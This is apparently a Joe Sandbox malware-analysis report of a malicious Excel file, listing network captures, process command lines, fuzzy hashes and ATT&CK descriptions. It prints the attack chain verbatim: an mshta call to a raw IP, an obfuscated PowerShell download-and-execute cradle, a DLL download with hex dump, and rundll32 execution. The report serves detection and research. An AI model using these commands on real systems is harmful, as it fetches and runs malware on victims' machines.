Jan 28, 2022 20:58:34.202501059 CET	14	IN	Data Raw: 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a 7d 20 0d 0a 53 6c 65 65 70 20 2d 73 20 34 3b 63 6d 64 20 2f 63 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 6f 77 36 34 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 27 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 Data Ascii: catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\JooSee.dll',ssAAqq;

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49168	103.206.244.105	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 20:58:55.599576950 CET	15	OUT	GET /assets/iM/ HTTP/1.1 Host: jurnalpjf.lan.go.id Connection: Keep-Alive
Jan 28, 2022 20:58:55.793814898 CET	16	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 19:58:55 GMT Server: Apache/2.4.6 (CentOS) PHP/7.4.27 X-Powered-By: PHP/7.4.27 Set-Cookie: 61f44affaa0ef=1643399935; expires=Fri, 28-Jan-2022 19:59:55 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Fri, 28 Jan 2022 19:58:55 GMT Expires: Fri, 28 Jan 2022 19:58:55 GMT Content-Disposition: attachment; filename="Fw6A4ZWhOBNhoQZNE5.dll" Content-Transfer-Encoding: binary Content-Length: 548864 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B
Jan 28, 2022 20:58:55.793844938 CET	18	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 20:58:55.793876886 CET	19	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 20:58:55.793893099 CET	21	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 20:58:55.793905973 CET	22	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d f8 8b 4d f8 e8 4f 00 00 00 89 45 fc 8b 4d fc e8 04 00 00 00 8b e5 5d c3 55 8b ec 51 89 4d fc 8b 45 fc 83 c0 0c 83 c9 ff f0 0f c1 08 49 85 c9 7f 17 8b 55 fc 52 8b 45 fc 8b 08 8b 55 fc 8b 02 8b 11 8b c8 8b Data Ascii: UMMOEM]UQMEIUREUB]UQME]UQMjjdMlYEdhE]UQMEPM"]UQM]Ui]
Jan 28, 2022 20:58:55.793919086 CET	23	IN	Data Raw: 00 88 4d fb 8b 55 10 8b 45 10 83 e8 01 89 45 10 85 d2 74 13 8b 4d fc 8a 55 fb 88 11 8b 45 fc 83 c0 01 89 45 fc eb dd 8b 45 08 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 45 0c 89 45 f8 8b 4d 08 89 4d fc c7 45 f4 00 Data Ascii: MUEEtMUEEE]UEEMMEUUE;EsMMUU]U}thjEPb]UQjh0EPjbEE]U}tEP
Jan 28, 2022 20:58:55.793936968 CET	25	IN	Data Raw: 83 c0 28 89 45 e4 c7 45 fc 01 00 00 00 eb 12 8b 4d fc 83 c1 01 89 4d fc 8b 55 e4 83 c2 28 89 55 e4 8b 45 08 8b 08 0f b7 51 06 39 55 fc 0f 8d c0 00 00 00 8b 45 e4 8b 48 08 89 4d dc 8b 55 08 8b 42 30 83 e8 01 f7 d0 23 45 dc 89 45 d8 8b 4d e4 51 8b Data Ascii: (EEMMU(UEQ9UEHMUB0#EEMQURMEE;EtMM;MvHUB$%tMuUEB$%EMUQ$UEE+EETMQURMu3DEEMMUUEH$M
Jan 28, 2022 20:58:55.793956995 CET	26	IN	Data Raw: cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c 50 8b 4d 08 51 ff 15 a8 62 04 10 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 50 ff 15 a4 62 04 10 5d c3 cc 55 8b ec 83 ec 60 89 4d a0 c7 45 bc 00 00 00 00 c7 45 f0 00 00 00 00 6a 40 8b Data Ascii: UEPMQb]UEPb]U`MEEj@EPMu3MMU=MZthb3MQ<REPMu3MUQ<UE8PEthb3xMQLthb
Jan 28, 2022 20:58:55.793976068 CET	28	IN	Data Raw: 8b 55 fc 8b 45 f0 03 42 20 89 45 e4 8b 4d fc 8b 55 f0 03 51 24 89 55 e0 c7 45 ec 00 00 00 00 c7 45 e8 00 00 00 00 eb 1b 8b 45 e8 83 c0 01 89 45 e8 8b 4d e4 83 c1 04 89 4d e4 8b 55 e0 83 c2 02 89 55 e0 8b 45 fc 8b 4d e8 3b 48 18 73 2d 8b 55 e4 8b Data Ascii: UEB EMUQ$UEEEEMMUUEM;Hs-UEPMQ>uUEE}ujb3)MU;Qvjb3EMHUE]UMEE}uMytUMQP(Uj
Jan 28, 2022 20:58:55.793992996 CET	29	IN	Data Raw: 05 10 8b 15 c8 30 05 10 0f af 15 c4 30 05 10 0f af 15 c8 30 05 10 03 ca 8b 15 c8 30 05 10 0f af 15 c4 30 05 10 2b ca 2b 0d c8 30 05 10 2b 0d c4 30 05 10 8b 15 c8 30 05 10 0f af 15 b8 30 05 10 03 0d c4 30 05 10 03 d1 03 15 c4 30 05 10 8b 0d c4 30 Data Ascii: 00000++0+0000000+000000++0+0000000+000000++0+0
Jan 28, 2022 20:58:55.972629070 CET	30	IN	Data Raw: 2b 0d c8 30 05 10 03 0d c0 30 05 10 2b 0d c4 30 05 10 a1 c0 30 05 10 0f af 05 c4 30 05 10 03 c8 2b 0d c0 30 05 10 03 0d c8 30 05 10 2b 0d c4 30 05 10 2b 0d c4 30 05 10 8b 15 c4 30 05 10 0f af 15 c4 30 05 10 03 ca 2b 0d c8 30 05 10 a1 c4 30 05 10 Data Ascii: +00+000+00+0+000+0000+00+000++00000++00+000+00+0+000+

Target ID:	0
Start time:	20:58:14
Start date:	28/01/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f780000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	20:58:15
Start date:	28/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Imagebase:	0x4a2c0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	20:58:16
Start date:	28/01/2022
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta http://91.240.118.172/gg/ff/fe.html
Imagebase:	0x13f4e0000
File size:	13824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	6
Start time:	20:58:19
Start date:	28/01/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Imagebase:	0x13f6e0000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Target ID:	8
Start time:	20:58:50
Start date:	28/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Imagebase:	0xe90000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Function 035B3368 Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409649947.00000000035B3000.00000010.00000800.00020000.00000000.sdmp, Offset: 035B3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35b3000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b85e43c367e2879514b94cf5aaedbacb7cd7b8c7dd9087eec7021f2134e87a
Instruction ID: 19b13c0782be6a4565cf02bcf2c3069d99cc198ae1668f51671405b116646518
Opcode Fuzzy Hash: 98b85e43c367e2879514b94cf5aaedbacb7cd7b8c7dd9087eec7021f2134e87a
Instruction Fuzzy Hash: 4751E63490DB8C4FE786E76CA4447647FE0FB5A384F0808EBE98AC72A3D1648C908757

Uniqueness

Uniqueness Score: -1.00%

Function 035B4120 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409665446.00000000035B4000.00000010.00000800.00020000.00000000.sdmp, Offset: 035B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35b3000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30406522c9a1acfeeb7e7e9ba6a437a515692daf6e4cb08132dc050faf6eea76
Instruction ID: 574eb1f1de8fb6174accacd3922b75d4c776846c4b26018000d6380aba507f48
Opcode Fuzzy Hash: 30406522c9a1acfeeb7e7e9ba6a437a515692daf6e4cb08132dc050faf6eea76
Instruction Fuzzy Hash: A251086061CA484FCB58EB1C9459A71F7E1FB5C300B5984EEE48AC72A3DA64CCD1C796

Uniqueness

Uniqueness Score: -1.00%

Function 035B4120 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409665446.00000000035B4000.00000010.00000800.00020000.00000000.sdmp, Offset: 035B3000, based on PE: false

Associated: 00000004.00000003.409649947.00000000035B3000.00000010.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35b3000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30406522c9a1acfeeb7e7e9ba6a437a515692daf6e4cb08132dc050faf6eea76
Instruction ID: 574eb1f1de8fb6174accacd3922b75d4c776846c4b26018000d6380aba507f48
Opcode Fuzzy Hash: 30406522c9a1acfeeb7e7e9ba6a437a515692daf6e4cb08132dc050faf6eea76
Instruction Fuzzy Hash: A251086061CA484FCB58EB1C9459A71F7E1FB5C300B5984EEE48AC72A3DA64CCD1C796

Uniqueness

Uniqueness Score: -1.00%

Function 035B4316 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409665446.00000000035B4000.00000010.00000800.00020000.00000000.sdmp, Offset: 035B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35b3000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9678970f2c553fc352c7c87c81ceda5f7d5b57f151b8801643913fa0d3bc77c1
Instruction ID: 7e8fe5791a7b9c7c658688af0acd39af43751dd9e16542513dd53f22a6991b51
Opcode Fuzzy Hash: 9678970f2c553fc352c7c87c81ceda5f7d5b57f151b8801643913fa0d3bc77c1
Instruction Fuzzy Hash: 3FD0A92140C3CA0BE313A33A146A0287F70AE5218832808CB88CACF193D81188A08362

Uniqueness

Uniqueness Score: -1.00%

Function 035B4316 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409665446.00000000035B4000.00000010.00000800.00020000.00000000.sdmp, Offset: 035B3000, based on PE: false

Associated: 00000004.00000003.409649947.00000000035B3000.00000010.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35b3000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9678970f2c553fc352c7c87c81ceda5f7d5b57f151b8801643913fa0d3bc77c1
Instruction ID: 7e8fe5791a7b9c7c658688af0acd39af43751dd9e16542513dd53f22a6991b51
Opcode Fuzzy Hash: 9678970f2c553fc352c7c87c81ceda5f7d5b57f151b8801643913fa0d3bc77c1
Instruction Fuzzy Hash: 3FD0A92140C3CA0BE313A33A146A0287F70AE5218832808CB88CACF193D81188A08362

Uniqueness

Uniqueness Score: -1.00%

Function 02DE0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409725608.0000000002DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_2de0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 61d86a9dd0d5da5a982eb16b25802e67682fd9574859b1fe2ceadb0ce07c2235
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02DE0F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409725608.0000000002DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_2de0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 61d86a9dd0d5da5a982eb16b25802e67682fd9574859b1fe2ceadb0ce07c2235
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02DE0F89 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409725608.0000000002DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_2de0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 61d86a9dd0d5da5a982eb16b25802e67682fd9574859b1fe2ceadb0ce07c2235
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02DE0F51 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409725608.0000000002DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_2de0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 61d86a9dd0d5da5a982eb16b25802e67682fd9574859b1fe2ceadb0ce07c2235
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02DE0F41 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409725608.0000000002DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_2de0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 61d86a9dd0d5da5a982eb16b25802e67682fd9574859b1fe2ceadb0ce07c2235
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02DE0F79 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409725608.0000000002DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_2de0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 61d86a9dd0d5da5a982eb16b25802e67682fd9574859b1fe2ceadb0ce07c2235
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02DE0F71 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409725608.0000000002DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_2de0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 61d86a9dd0d5da5a982eb16b25802e67682fd9574859b1fe2ceadb0ce07c2235
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02DE0F11 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409725608.0000000002DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_2de0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 61d86a9dd0d5da5a982eb16b25802e67682fd9574859b1fe2ceadb0ce07c2235
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02DE0F21 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.409725608.0000000002DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_2de0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 61d86a9dd0d5da5a982eb16b25802e67682fd9574859b1fe2ceadb0ce07c2235
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 800, Parent PID: 2804COMMON

Executed Functions

Function 000007FF00250908 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

(, xrefs: 000007FF00250A16

Memory Dump Source

Source File: 00000006.00000002.666504736.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff00250000_powershell.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: a9d47d824d17aba13576407d5c4d57fbd7b27641b7b0f358222eec03e2b5b65d
Instruction ID: a78bf8df092f6a4ca371b5ed3273d2d40eaff9918e0b28e805aa6afa2900d187
Opcode Fuzzy Hash: a9d47d824d17aba13576407d5c4d57fbd7b27641b7b0f358222eec03e2b5b65d
Instruction Fuzzy Hash: AC314B2054E7C64FEB57977858A53A07FB0AF17215B1E04EBC088CF1B3DA585C5AC722

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00250A21 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.666504736.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff00250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74072b692f437a4123ec2b75194eae8f77f3575d1923667681018819627ec993
Instruction ID: 50b5a764969d66e30e27cb846d8220666982e03859bffa53c9f816becb8e1b38
Opcode Fuzzy Hash: 74072b692f437a4123ec2b75194eae8f77f3575d1923667681018819627ec993
Instruction Fuzzy Hash: CF718C61A1EBC60FEB4357385CA66607FB0AF17215B1E40EBD4C8CB0E3D958985AC362

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

